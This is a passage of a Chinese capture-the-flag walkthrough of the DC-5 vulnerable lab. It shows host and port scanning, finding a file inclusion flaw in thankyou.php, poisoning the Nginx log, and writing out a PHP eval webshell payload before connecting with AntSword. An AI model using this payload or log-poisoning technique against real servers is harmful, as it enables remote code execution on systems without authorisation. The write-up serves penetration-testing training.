网络安全技术分享( 二 ) _网络安全

【网络安全技术分享】题目描述：
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it **is** there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will **hopefully** provide some kind of idea as to what the vulnerability might involve.And just for the record, there is no phpmailer exploit involved. :-)The ultimate goal of this challenge is to get root and to read the one and only flag.描述中说到something that changes with a refresh of a page（随着页面刷新而改变的东西），这里我们留意一下。并且靶机只有一个flag
知识点总结：
①端口扫描(熟悉常用的几个端口是哪个服务)
②文件包含漏洞
③利用文件包含写入shell
④screen提权
1.使用命令列出局域网内所有主机
arp-scan -l

文章插图

获得目标主机IP：192.168.2.118
2.使用nmap扫描目标主机查看开放端口

root@kali:~#nmap -sV -p- 192.168.2.118 参数说明：                -sV 用来扫描目标主机和端口上运行的软件的版本      -p 80 指定80端口      -p- 扫描0-65535全部端口

文章插图

可以看到开放了80端口,代表有web服务，直接访问
常用端口参考链接
3.访问IP查看web内容

文章插图

在contact模块发现了留言板的功能，随便输入测试一下

文章插图

看到请求被提交到了thankyou.php ，并且有参数，为GET方式传参。从题目描述中我们也知道提示到了刷新，我们刷新下页面看下

文章插图

被圈住的地方每当刷新一次都会改变，由此我们可以联想到可能有文件包含漏洞
我们现在先扫一下目录看一下是哪个文件被包含进来
使用DirBuster扫描目录

文章插图

可以发现有一个footer.php 访问一下正好验证文件包含的漏洞

文章插图

4.测试文件包含参数
那么我们现在就要确定文件包含的参数是哪一个，一般page ， file ， filename用的比较多，我们可以试一下，如果不是我们也可以用kali里边自带的字典进行fuzz

文章插图

由此，我们可以确定参数为file
我们现在可以对文件进行读取了，但是我们的目的是获取shell ，如果只读取文件是无法完成的，我们需要往里边写东西，于是可以想到利用日志文件，将shell写入日志文件然后进行文件包含

文章插图

可以看到网站是Nginx的， Nginx 的日志默认路径是
/var/log/nginx/error.log?/var/log/nginx/access.log我们也可以通过FuzzDB提供的字典进行爆破日志的位置

文章插图

有了日志文件位置，接下来就要往日志文件写一句话木马
5.写入一句话木马
?file=<?php @eval($_POST[123]);?>

文章插图

查看日志文件

文章插图

可以看到一句话木马已经被写进日志文件了
使用蚁剑进行连接

网络安全技术分享( 二 )

推荐阅读

高圆圆是自然受孕还是试管高圆圆怀孕

济南有啥好吃的餐店请老饕出现！

猫眼娱乐| 谭咏麟与网红同台，70岁高龄卖力演出，却被嘲昔日天王太掉价？，

古风师徒文“人家拜师去山门，我拜师父倒插门”这设定如你所愿！

江西支援湖北随州价值约千万元防控和生活物资

包露台的利弊包露台的利弊有哪些

捕娱者说致敬魅族Pro7？华为全面屏手机新专利曝光：后置四摄+迷你显示屏

在炎热的夏季养生的九个小常识

十大冲锋衣品牌排行榜冲锋衣品牌有哪些

【红豆杉】3种带香味的树，家里养一棵，四季清香，人人见了都喜欢

直播吧|尤文1-0领先莱切，迪罗连线！C罗助攻迪巴拉世界波破门

私生饭|她父母还没来的及报警，就自己回来了，开心笑话：表妹误入了传销

优步在伦敦推出水上打船服务

智能|百度启动20亿专项激励预计今年为合作伙伴带来200亿元收入

gta5豪华版和普通版有什么区别？

人民日报客户端湖南频道|6个月下线！伊斯坦布尔将迎来“中国造”地铁列车

北京警方摧毁大兴3个“地下”赌场 61名涉案人员被控

体育课代表韩梅|此数据触目惊心道出问题根本，火箭不善于打关键球的根源浮现

同方全球人寿荣获2020中国常春奖“年度健康保险企业”

【生物谷】沉迷其中有什么危害？父母的纵容不可取！，宝宝依赖手机